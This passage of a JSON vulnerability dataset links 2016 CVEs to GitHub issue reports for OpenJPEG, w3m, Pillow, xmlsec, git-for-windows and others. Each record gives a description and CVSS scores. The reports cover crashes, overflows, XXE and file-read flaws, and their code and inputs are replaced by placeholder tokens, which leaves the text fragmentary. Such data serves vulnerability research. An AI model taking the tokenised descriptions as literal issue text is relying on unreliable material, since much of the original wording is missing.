        "description": "NULL Pointer Access in function imagetopnm of APITAG DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG ca7 bp NUMBERTAG bfd NUMBERTAG sp NUMBERTAG bfd NUMBERTAG T NUMBERTAG ca6 ( PATHTAG NUMBERTAG f ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information (rr) p image >comps NUMBERTAG d NUMBERTAG dy NUMBERTAG w NUMBERTAG h NUMBERTAG y NUMBERTAG prec NUMBERTAG bpp NUMBERTAG sgnd NUMBERTAG resno_decoded NUMBERTAG factor NUMBERTAG data NUMBERTAG alpha NUMBERTAG Poc Contact me if you need Poc file at EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9118",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/861",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/861",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-10-30T03:53:07Z",
        "description": "Heap Buffer Overflow in function pnmtoimage of convert.c. Description APITAG Heap Buffer Overflow in function pnmtoimage of APITAG Testing Environment Ubuntu NUMBERTAG APITAG Exception Information Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG f4 at pc NUMBERTAG bp NUMBERTAG bffe NUMBERTAG sp NUMBERTAG bffe NUMBERTAG c WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG f4 thread T NUMBERTAG PATHTAG NUMBERTAG b6 ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f4 is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f4) allocated by thread T0 here NUMBERTAG f4 ( PATHTAG NUMBERTAG b NUMBERTAG e0c ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG b6 ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG ae NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING GDB Information Program received signal SIGSEGV, Segmentation fault NUMBERTAG cb5 in pnmtoimage (filename NUMBERTAG bf9b1e NUMBERTAG APITAG parameters NUMBERTAG bf9b NUMBERTAG at PATHTAG NUMBERTAG image APITAG = (((uc>>bit NUMBERTAG rr) p i NUMBERTAG rr) p NUMBERTAG rr) p y NUMBERTAG rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG e8 (rr) p h NUMBERTAG rr) p w NUMBERTAG rr) p image APITAG Cannot access memory at address NUMBERTAG Analysis ERRORTAG Poc Contact me if you need Poc file at EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-9177",
        "Issue_Url_old": "https://github.com/perwendel/spark/issues/700",
        "Issue_Url_new": "https://github.com/perwendel/spark/issues/700",
        "Repo_new": "perwendel/spark",
        "Issue_Created_At": "2016-11-04T12:13:25Z",
        "description": "Arbitrary File Read Vulnerability. Just posting it here so it gets visbility, I didn't write the original message: URLTAG There appears to be a vulnerability which lets users read any file from the file system",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-9189",
        "Issue_Url_old": "https://github.com/python-pillow/Pillow/issues/2105",
        "Issue_Url_new": "https://github.com/python-pillow/pillow/issues/2105",
        "Repo_new": "python-pillow/pillow",
        "Issue_Created_At": "2016-09-06T17:36:21Z",
        "description": "Multiple memory corruption vulnerabilities. While performing a security assessment for a client, we identified a number of potential memory corruption vulnerabilities within the native extensions included with Pillow. Given that these vulnerabilities may currently represent exploitable conditions within our client's environment we, would like to report their details privately. Could a project member please limit the visibility of this issue so that it is not available to the public? Alternatively, we can provide vulnerability details via e mail if that is preferable. Thank you, Cris Neckar Divergent Security",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-9243",
        "Issue_Url_old": "https://github.com/pyca/cryptography/issues/3211",
        "Issue_Url_new": "https://github.com/pyca/cryptography/issues/3211",
        "Repo_new": "pyca/cryptography",
        "Issue_Created_At": "2016-11-01T19:47:20Z",
        "description": "HKDF key length inconsistency. For too small key sizes, APITAG outputs an empty array instead of a small key: Program: CODETAG Output: APITAG Suggested fix: I am not quite sure why the division by NUMBERTAG in the snippet below was added. The cumulative size of the output array is always APITAG and thus we can stop after APITAG . At first I thought this might be a clever trick taken from the paper, but I didn't find it there. I guess there was a mixup between bits and bytes at some point. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-9274",
        "Issue_Url_old": "https://github.com/git-for-windows/git/issues/944",
        "Issue_Url_new": "https://github.com/git-for-windows/git/issues/944",
        "Repo_new": "git-for-windows/git",
        "Issue_Created_At": "2016-11-04T17:15:19Z",
        "description": "EXE hijacking runs unexpected code when using context menus in Windows Explorer. Setup Which version of Git for Windows are you using? Is it NUMBERTAG bit or NUMBERTAG bit? FILETAG Which version of Windows are you running? Vista NUMBERTAG Is it NUMBERTAG bit or NUMBERTAG bit? Windows NUMBERTAG What options did you set as part of the installation? Or did you choose the defaults? Defaults ` One of the following: C:\\>type APITAG PATHTAG Path Option: Cmd SSH Option: APITAG CRLF Option: APITAG Bash Terminal Option: APITAG Performance Tweaks APITAG Enabled Enable Symlinks: Disabled Any other interesting things about your environment that might be related to the issue you're seeing? Don't think so. Had some buddies reproduce the issue on Windows NUMBERTAG Details Which terminal/shell are you running Git from? e.g PATHTAG Windows Explorer What commands did you run to trigger this issue? Here is an example of the steps to reproduce in Windows Explorer URLTAG What did you expect to occur after running these commands? Open Git Bash in the current folder What actually happened instead? Arbitrary file named APITAG in the current folder was executed. This has security implications since users will not expect this behavior when using Windows context menus. For example, a security conscious user would know not to execute EXE files included in an untrusted repository, but using Windows context menus could unexpectedly execute such untrusted code. This issue is similar to DLL hijacking if you are familiar with that. Here is a brief explanation of DLL hijacking if you're not familiar URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-9298",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/296",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/296",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-10-31T22:18:46Z",
        "description": "crash. PATHTAG Overall demo of the major APITAG methods. use APITAG use aliased APITAG => 'im'; Read model & smile image. print APITAG $null=im >new; $null APITAG $x=$null APITAG warn \"$x\" if \"$x\"; $model=im APITAG $x=$model APITAG warn \"$x\" if \"$x\"; $model APITAG $model APITAG $smile=im >new; $x=$smile APITAG warn \"$x\" if \"$x\"; $smile APITAG $smile APITAG Create image stack. print APITAG APITAG $images=im APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Resize'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Sharpen'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Threshold'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Noise'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Gamma'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Level'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Stretch'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG pixel'=>'white'); push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG points NUMBERTAG strokewidth NUMBERTAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Edges'); $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG push( APITAG >Fx(expression NUMBERTAG u')); print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG push( APITAG print APITAG $gradient=im >new; $gradient APITAG $x=$gradient APITAG NUMBERTAG a0ff ffff NUMBERTAG warn \"$x\" if \"$x\"; $gradient APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Stretch'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Filter'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG $example=$model APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Paint'); $example APITAG push( APITAG print APITAG $plasma=im >new; $plasma APITAG $x=$plasma APITAG warn \"$x\" if \"$x\"; $plasma APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG gravity=>'center'); push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Noise'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Contrast'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Mask'); $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG Create image montage. print APITAG $montage=$images APITAG APITAG ffffff', APITAG NUMBERTAG stroke=>'none', shadow=>'true'); $logo=im APITAG $logo APITAG $logo APITAG $montage APITAG print APITAG $montage APITAG $montage APITAG print APITAG $montage APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-9318",
        "Issue_Url_old": "https://github.com/lsh123/xmlsec/issues/43",
        "Issue_Url_new": "https://github.com/lsh123/xmlsec/issues/43",
        "Repo_new": "lsh123/xmlsec",
        "Issue_Created_At": "2016-10-06T17:08:21Z",
        "description": "xmlsec vulnerable to XXE. Description An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Whenever xmlsec verifies, encrypt, decrypt an XML document the parse by default reads external entities resulting on an XXE Vulnerability. Proof of Concept APITAG Running a fake command to test: ERRORTAG Listener: CODETAG Note: The same results were found as a result of trying to encrypt or decyrpt content. Recommendations It is my recommendation that the xmlsec library by default denies External Entities and local file inclusion and/or provides a command line option that can be used to block them.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-9422",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/8",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/8",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-11T19:32:39Z",
        "description": "Stack seems smashed with large image inside table. How to reproduce CODETAG The behavior is not stable. w3m sometimes crashes and sometimes doesn't. Usually It just segfault and sometimes stack protector says stack smashed. I haven't debug it, so I don't know why it's unstable and how the stack smashed. Following is my steps to compile w3m: APITAG This is found by afl fuzz.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9423",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/9",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/9",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-12T11:58:50Z",
        "description": "malform html tag may crash w3m. How to reproduce CODETAG gdb log ERRORTAG Looks like something overflow and overwrite \"a\" pointer. This is found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9424",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/12",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/12",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-16T17:54:10Z",
        "description": "heap out of bound write due to negative array index. How to reproduce: CODETAG Here, selectnumber could be negative, or positive but overflows to negative. The corresponding code snippet: CODETAG APITAG is the selectnumber mentioned above. It will crash at line NUMBERTAG Similar code pattern at line NUMBERTAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9425",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/21",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/21",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-19T16:05:49Z",
        "description": "segfault due to write to APITAG NUMBERTAG in APITAG ERRORTAG This is found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9426",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/25",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/25",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-21T18:34:47Z",
        "description": "heap corruption due to integer overflow in APITAG This bug is interesting since it triggered libgc's issue URLTAG as well. How to reproduce APITAG gdb CODETAG This demonstrate libgc's bug. n NUMBERTAG libgc treat it as ERRORTAG NUMBERTAG The allocation should be failed (either return NULL or abort the program). But it returns NUMBERTAG df NUMBERTAG If continue to run CODETAG With further investigation, w3m's negative size comes from table.c, APITAG line NUMBERTAG APITAG where APITAG NUMBERTAG but APITAG is short . After assignment, APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9427",
        "Issue_Url_old": "https://github.com/ivmai/bdwgc/issues/135",
        "Issue_Url_new": "https://github.com/ivmai/bdwgc/issues/135",
        "Repo_new": "ivmai/bdwgc",
        "Issue_Created_At": "2016-08-21T11:55:16Z",
        "description": "integer overflow in GC_MALLOC_ATOMIC. When call APITAG the expected behavior should be out of memory obviously and return NULL. However, libgc will return a pointer. The caller thought the allocation succeeded and started to write data into heap via the said pointer and thus heap corruption. The reason is integer overflow in macro APITAG URLTAG APITAG (sz) + HBLKSIZE NUMBERTAG overflows and become a small positive number. After the overflow, libgc allocates a small block of memory and return the pointer.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-9428",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/26",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/26",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-28T15:44:14Z",
        "description": "heap buffer overflow write in APITAG input CODETAG ERRORTAG pr is corrupted. Note the correct address of pr is NUMBERTAG c7f NUMBERTAG but its highest byte is overwritten by NUMBERTAG b=='[' This is because buffer overflows earlier in APITAG (several times). With following assertion, it can catch the overflow easier. CODETAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9429",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/29",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/29",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-10-03T00:58:31Z",
        "description": "global buffer overflow write in APITAG input CODETAG APITAG output ERRORTAG gdb output CODETAG found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9430",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/7",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/7",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-08T08:43:17Z",
        "description": "segfault for malform APITAG tag. How to reproduce APITAG CODETAG This is found by afl fuzz.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9431",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/10",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/10",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-14T13:38:48Z",
        "description": "stackoverflow in APITAG on malform input. How to reproduce: CODETAG ASAN output: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9432",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/13",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/13",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-16T18:08:59Z",
        "description": "crash due to bcopy with negative size. How to reproduce ERRORTAG crash because bcopy with negative size. this is found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9433",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/14",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/14",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-16T18:47:09Z",
        "description": "segfault when iso NUMBERTAG parsing. ERRORTAG found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9434",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/15",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/15",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-16T19:14:06Z",
        "description": "segfault with incorrect form_int fid. ERRORTAG this is found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9437",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/17",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/17",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-17T09:37:10Z",
        "description": "write access violation with ' APITAG '. CODETAG Writing to rodata section and crash. This is found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9438",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/18",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/18",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-17T10:38:42Z",
        "description": "Null pointer dereference with input_alt tag. Null pointer dereference ERRORTAG this is found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9439",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/20",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/20",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-19T15:56:01Z",
        "description": "infinite recursion with nested table and textarea. ERRORTAG I found w3m called APITAG earlier. This is found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9440",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/22",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/22",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-19T16:58:10Z",
        "description": "segfault due to dereference near null pointer in APITAG Input: CODETAG gdb trace: ERRORTAG This is found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9441",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/24",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/24",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-20T13:24:56Z",
        "description": "segfault due to dereference near null pointer in do_refill. input CODETAG gdb CODETAG found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9443",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/28",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/28",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-10-02T15:20:37Z",
        "description": "Null pointer dereference in APITAG Input file CODETAG gdb log ERRORTAG found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9479",
        "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/33",
        "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/33",
        "Repo_new": "b2evolution/b2evolution",
        "Issue_Created_At": "2016-11-17T12:03:32Z",
        "description": "A vulnerability to change any user's password. MENTIONTAG I find a vulnerability in version NUMBERTAG stable, an attacker can exploit this vulnerability to change other user's password. I have send a message to you in b2evolution.net with detail information. I hope this would be helpful to you to fix it.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
